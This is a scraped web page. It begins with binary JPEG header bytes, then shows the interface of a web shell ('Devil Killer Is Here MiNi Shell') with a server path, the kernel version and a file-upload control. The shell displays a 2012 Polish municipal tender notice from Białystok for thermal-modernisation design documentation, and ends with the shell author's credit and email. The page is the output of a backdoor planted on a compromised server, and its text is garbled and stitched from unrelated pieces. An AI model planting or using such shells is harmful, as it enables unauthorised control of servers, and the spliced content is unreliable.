JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20120518/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20120518/110781-N-2012.html

<p class="kh_header"><b>Białystok: OPRACOWANIE DOKUMENTACJI PROJEKTOWEJ WRAZ Z UZYSKANIEM NIEZBĘDNYCH DECYZJI NA WYKONANIE TERMOMODERNIZACJI BUDYNKÓW MIESZKALNYCH   I UŻYTKOWYCH BĘDĄCYCH WŁASNOŚCIĄ ZARZĄDU MIENIA KOMUNALNEGO             W BIAŁYMSTOKU.- nr sprawy: TT/DZ/3412/42/12</b><br>
<b>Numer ogłoszenia: 110781 - 2012; data zamieszczenia: 18.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Mienia Komunalnego , ul. gen. J. Bema 89/1, 15-370 Białystok, woj. podlaskie, tel. 085 7479457, faks 085 7479483.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zmk.bialystok.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> OPRACOWANIE DOKUMENTACJI PROJEKTOWEJ WRAZ Z UZYSKANIEM NIEZBĘDNYCH DECYZJI NA WYKONANIE TERMOMODERNIZACJI BUDYNKÓW MIESZKALNYCH   I UŻYTKOWYCH BĘDĄCYCH WŁASNOŚCIĄ ZARZĄDU MIENIA KOMUNALNEGO             W BIAŁYMSTOKU.- nr sprawy: TT/DZ/3412/42/12.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest: Opracowanie dokumentacji projektowej wraz z uzyskaniem niezbędnych decyzji na wykonanie termomodernizacji budynków mieszkalnych i użytkowych będących własnością Zarządu Mienia Komunalnego w Białymstoku.-zgodnie z opisem przedmiotu zamówienia stanowiącym zał. nr 1.1, 1.2 i 1.3  do SIWZ.
Zadanie nr 1
Opracowanie dokumentacji projektowej wraz z uzyskaniem niezbędnych decyzji  na termomodernizację budynków mieszkalnych usytuowanych na działkach o nr geodezyjnych: 289/2, 290, 291, 292, 293,294,295, 296,297,298,299, 300,301,302,304 i 305 w obr. 16,  przy ul. Matejki 22,24,26 i 28  w Białymstoku.

 Zadanie nr 2
Opracowanie dokumentacji projektowej wraz z uzyskaniem niezbędnych decyzji  na termomodernizację przychodni zdrowia usytuowanych na działkach o nr geodezyjnych: 1095/129, 1095/123, 1095/107,1095/90 w obr. 17 Bojary , przy ul. Mieszka I 8C  w Białymstoku.

Zadanie nr 3
Opracowanie dokumentacji projektowej wraz z uzyskaniem niezbędnych decyzji  na termomodernizację budynków mieszkalnych usytuowanych na działkach o nr geodezyjnych: 777/15, 777/9, 777/10 i 777/12     w obr. 16,  przy ul. St. Suchowolca 26A,26C,26D i 26 E w Białymstoku.

2. Zakres prac obejmuje następujące elementy:
 Dokumentację projektową budowlaną opracowaną zgodnie z Rozporządzeniem Ministra Infrastruktury     z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno użytkowego (Dz. U. Nr 202, poz. 2072 z późn. zmianami) oraz zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003 w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. Nr 120, poz. 1133) wraz z opiniami, uzgodnieniami i pozwoleniami wymaganymi przepisami szczególnymi.
3. Określa się wymaganą ilość egzemplarzy poszczególnych części dokumentacji:
a) ) Opracowanie audytu energetycznego budynków  -  po 2 egz. na budynek
b) Projekt budowlany wraz z projektem zagospodarowania terenu w celu zgłoszenia robót  - po  5 egz.
c) Projekt wykonawczy  - po 3 egz.,
d) Informacja do planu BIOZ - po  5 egz.
e) Przedmiary robót  do celów sporządzenia oferty -- po 2 egz.,,   
f) )Szczegółowe specyfikacje techniczne wykonania i odbioru robót budowlanych - po 2 egz. 
g) Kosztorys inwestorski opracowany zgodnie z Rozporządzeniem Ministra Infrastruktury dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno - użytkowym (Dz. U. Nr 130 poz. 1389)  - po 2 egz.,
h) Pełna dokumentacja w wersji elektronicznej pdf, dodatkowo rysunki w dwg i przedmiary  w wersji ath.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.22.10.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunku wykonawca winien przedłożyć wykaz wykonanych zamówień w okresie ostatnich 3 lat przed upływem terminu składania ofert w niniejszym postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - co najmniej 2 zamówienia na wykonanie dokumentacji projektowej  na termomodernizację budynków o wartości min. 18.000,00 zł brutto -każde ,z podaniem przedmiotu, dat wykonania i odbiorców, z załączeniem dokumentu potwierdzającego, że prace zostały wykonane należycie;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunku wykonawca winien przedłożyć wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych niezbędnych dla wykonania zamówienia,  a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - co najmniej 1 osobę posiadającej uprawnienia budowlane do projektowania bez ograniczeń w specjalności: konstrukcyjno-budowlanej.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia:
a) każdy wykonawca zobowiązany jest złożyć oddzielnie dokument określony w Rozdz.VI pkt.2 ppkt.2,
b) warunki dotyczące posiadania wiedzy i doświadczenia będą badane łącznie - dokumenty określone     w Rozdz. VI pkt 1 ppkt 2, 3 i 4 powinien złożyć co najmniej jeden z wykonawców  wspólnie ubiegających  się o udzielenie zamówienia,
c) oświadczenie o spełnieniu warunków udziału w postępowaniu określone w Rozdz. VI pkt 1 ppkt 1 oraz oświadczenie o nie podleganiu wykluczeniu określone w Rozdz. VI pkt 2 ppkt 1 składa pełnomocnik wykonawców wspólnie ubiegających się o udzielenie zamówienia w ich imieniu bądź każdy                     z wykonawców oddzielnie.
2. Zgodnie z art. 26 ust 2b) i 2c) ustawy Pzp, wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca    w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania   nich przy wykonaniu zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Strony dopuszczają możliwość przedłużenia terminu wykonania przedmiotu umowy określonego w ust. 1 o czas opóźnienia, jeżeli takie opóźnienie jest lub będzie miało wpływ na wykonanie przedmiotu umowy w następujących przypadkach:
    1) wystąpienia konieczności wykonania dodatkowych i niemożliwych do przewidzenia prac, których zrealizowanie jest niezbędne z uwagi na zmianę obowiązujących przepisów, a których przeprowadzenie wiąże się z potrzebą zmiany terminu,
    2) jakiegokolwiek opóźnienia, utrudnienia lub przeszkód spowodowanych przez lub dających się przypisać Zamawiającemu,
    3)  siły wyższej,
    4)  wydłużenie postępowania w sprawie wydawania decyzji administracyjnych,
    5)  wystąpienie innych szczególnych okoliczności, za które Wykonawca nie jest odpowiedzialny.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zmk.bialystok.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Mienia Komunalnego  15-370 Białystok ul. gen. j. Bema 89/1 - pok.111.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.05.2012 godzina 10:00, miejsce: Zarząd Mienia Komunalnego  15-370 Białystok ul. gen. j. Bema 89/1 - pok.201 -sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1
Opracowanie dokumentacji projektowej wraz z uzyskaniem niezbędnych decyzji  na termomodernizację budynków mieszkalnych usytuowanych na działkach o nr geodezyjnych: 289/2, 290, 291, 292, 293,294,295, 296,297,298,299, 300,301,302,304 i 305 w obr. 16,  przy ul. Matejki 22,24,26 i 28               w Białymstoku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie dokumentacji projektowej na termomodernizację budynku obejmującą: 
a)	Docieplenia ścian elewacji i ścian fundamentowych,
b)	Docieplenia stropodachów wentylowanych, 
c)	Wymiany stolarki okiennej w częściach wspólnych budynków, 
d)	Wykończenia powierzchni podestów schodowych i opasek budynków
e)	Remontu  zadaszeń nad wejściami,
f)	Wykonanie  nowej instalacji odgromowej jeżeli jest wymagana,
g)	Rozebranie komina kotłowni  budynku nr 26,
h)	Likwidacja składu opału przy budynku nr 26
i)	Modernizację i regulację instalacji co
3.   Podstawowe dane techniczne obiektów:
Budynek przy  ul. Jana Matejki 22
      Rok budowy - 1979
      Powierzchnia użytkowa - 348,00 m2,
      Kubatura - 1960,00 m3,
      Teren jest częściowo ogrodzony

Budynek przy  ul. Jana Matejki 24
      Rok budowy - 1979
      Powierzchnia użytkowa - 348,00 m2,
      Kubatura - 1960,00 m3,
      Teren jest częściowo ogrodzony

Budynek przy  ul. Jana Matejki 26
      Rok budowy - 1978
      Powierzchnia użytkowa - 359,00 m2,    
  Kubatura - 2400,00 m3,
      Teren jest częściowo ogrodzony

Budynek przy  ul. Jana Matejki 22
      Rok budowy - 1978
      Powierzchnia użytkowa - 349,00 m2,
      Kubatura - 1960,00 m3,
      Teren jest częściowo ogrodzony
2.  Dokumentacja winna obejmować zakres  niezbędny do uzyskania pozwolenia na budowę .
a) opracowanie audytu energetycznego budynków  -  po 2 egz. budynek
b) projekt budowlany              - 5 egz.
c) projekty wykonawcze         - 3 egz.
d) informacja do planu BIOZ  - 5 egz.           
     
e) przedmiary robót. które powinny zawierać zestawienia przewidywanych do wykonani robót podstawowych w kolejności technologicznej ich wykonania, ze szczegółowym opisem                 i wskazaniem podstaw ustalających szczegółowy opis oraz wskazaniem właściwych specyfikacji technicznych wykonywania i odbioru robót budowlanych, z wyliczeniem i zestawieniem ilości jednostek przedmiarowych robót podstawowych   - 2 egz,
f) kosztorysy inwestorskie - 2 egz
g) specyfikacje techniczne wykonywania i odbioru robót budowlanych  ( wszystkie   branże) -     2 egz
h)  pełną dokumentację w wersji elektronicznej  pdf oraz dodatkowo rysunki w dwg,  przedmiary w wersji ath
Założenia ogólne do projektowania:
-   Dokumentacja projektową należy wykonać zgodnie z obowiązującymi przepisami                      i obowiązującymi Polskimi Normami i zasadami wiedzy technicznej.
-     Dokumentacja projektowa powinna być wykonana w stanie kompletnym z punktu widzenia celu, któremu ma służyć i musi być opracowana wg zasad określonych w Rozporządzeniu Ministra Infrastruktury z dnia  2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych oraz programu funkcjonalno użytkowego (Dz.U. z 2004 r. Nr 202, poz. 2072) z późniejszymi zmianami.
-   Dokumentacja projektowa będzie służyć jako opis przedmiotu zamówień do przetargu            w oparciu o ustawę Prawo zamówień publicznych na roboty budowlane oraz realizację robót budowlanych na jej podstawie.
-  Dokumentacja projektowa w swej treści nie może określać technologii robót, materiałów, maszyn i urządzeń w sposób utrudniający uczciwą konkurencję.
-  Dokumentacja projektowa powinna określać parametry techniczne i funkcjonale przyjętych rozwiązań materiałowych, wybranej technologii, maszyn i urządzeń. 
-     Dopuszcza się wskazanie w dokumentacji projektowej na znak towarowy, patent lub pochodzenie z uzasadnionych względów technologicznych, ekonomicznych lub organizacyjnych na zasadach określonych w art. 29 ustawy Prawo zamówień publicznych.
-  Specyfikacja techniczna wykonania i odbioru robót musi być opracowana wg zasad określonych w Rozporządzeniu Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno użytkowego (Dz. U. z 2004 r. Nr 202, poz. 2072) z późniejszymi zmianami.
-  Kosztorys inwestorski należy wykonać zgodnie z Rozporządzeniem Ministra Infrastruktury       z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. z 2004 r.          Nr 130, poz. 1398) wraz z zestawieniem materiałów.
-    Dokumentacja projektowa powinna posiadać wszystkie niezbędne opinie, uzgodnienie            i sprawdzenia projektowe w zakresie wynikającym z przepisów. 
-    Dokumentacja projektowa powinna spełniać wszystkie wymogi potrzebne do uzyskania pozwolenia na budowę lub dokonania zgłoszenia.
-        Projekty wchodzące w skład dokumentacji projektowej muszą być wzajemnie skoordynowane technicznie i kompletne z punktu widzenia celu jakiemu mają służyć.
3. Dokumentację należy wykonać w podziale na dwa etapy:
Etap I - wykonanie dokumentacji projektowej na ocieplenie budynków nr 22,24,26,28
Etap II  - wykonanie dokumentacji na rozbiórkę komina nad dachem budynku nr 26 i likwidację składu opału przy budynku Nr 26.
4. Termin realizacji zadań:
Etap I - 8 tygodni od daty podpisania umowy 
Etap II - trzy miesiące od daty podpisania umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.22.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Opracowanie dokumentacji projektowej wraz z uzyskaniem niezbędnych decyzji  na termomodernizację przychodni zdrowia usytuowanych na działkach o nr geodezyjnych: 1095/129, 1095/123, 1095/107,1095/90 w obr. 17 Bojary , przy ul. Mieszka I 8C  w Białymstoku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -	Wykonanie dokumentacji projektowej na termomodernizację budynku obejmującą: 
a)	Docieplenia ścian zewnętrznych kondygnacji nadziemnych
b)	Docieplenia  ścian zewnętrznych piwnic 
c)	Docieplenia stropodachu wentylowanego 
d)	Docieplenia stropu zewnętrznego
e)	Wymianę starych okien w naświetlach części wysokich budynku
f)	Likwidację przeszkleń z luksferów
g)	Wymianę pokrycia z eternitu 
h)	Wymianę podsufitki 
i)	Modernizację i regulację instalacji co
3.   Podstawowe dane techniczne przychodni.
 przy  ul. Mieszka I 8C
      Rok budowy - 1987
      Powierzchnia użytkowa - 2720.20 m2,
      Kubatura - 11820,00 m3,
      Teren nie  ogrodzony
2. Termin realizacji zadań: 10 tygodni od daty podpisania umowy 
3. Pozostałe wymagania w zakresie dokumentacji  takie same jak w zad. 1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.22.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 70.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Opracowanie dokumentacji projektowej wraz z uzyskaniem niezbędnych decyzji  na termomodernizację budynków mieszkalnych usytuowanych na działkach o nr geodezyjnych: 777/15, 777/9, 777/10 i 777/12     w obr. 16,  przy ul. St. Suchowolca 26A,26C,26D i 26 E w Białymstoku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -	Wykonanie dokumentacji projektowej na termomodernizację budynku obejmującą: 
j)	Docieplenia ścian elewacji i ścian fundamentowych,
k)	Docieplenia stropów
l)	Wymiany stolarki okiennej w częściach wspólnych budynku
m)	Wymiany stolarki drzwiowej    j.w.
n)	Wykończenia powierzchni podestów schodowych i opasek budynków
o)	Remontu  zadaszeń nad wejściami,
p)	Wykonanie  nowej instalacji odgromowej jeżeli jest wymagana,
q)	Modernizację i regulację instalacji co

2. Termin realizacji zadań: 10 tygodni od daty podpisania umowy 
3. Pozostałe wymagania w zakresie dokumentacji  takie same jak w zad. 1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.22.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 70.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com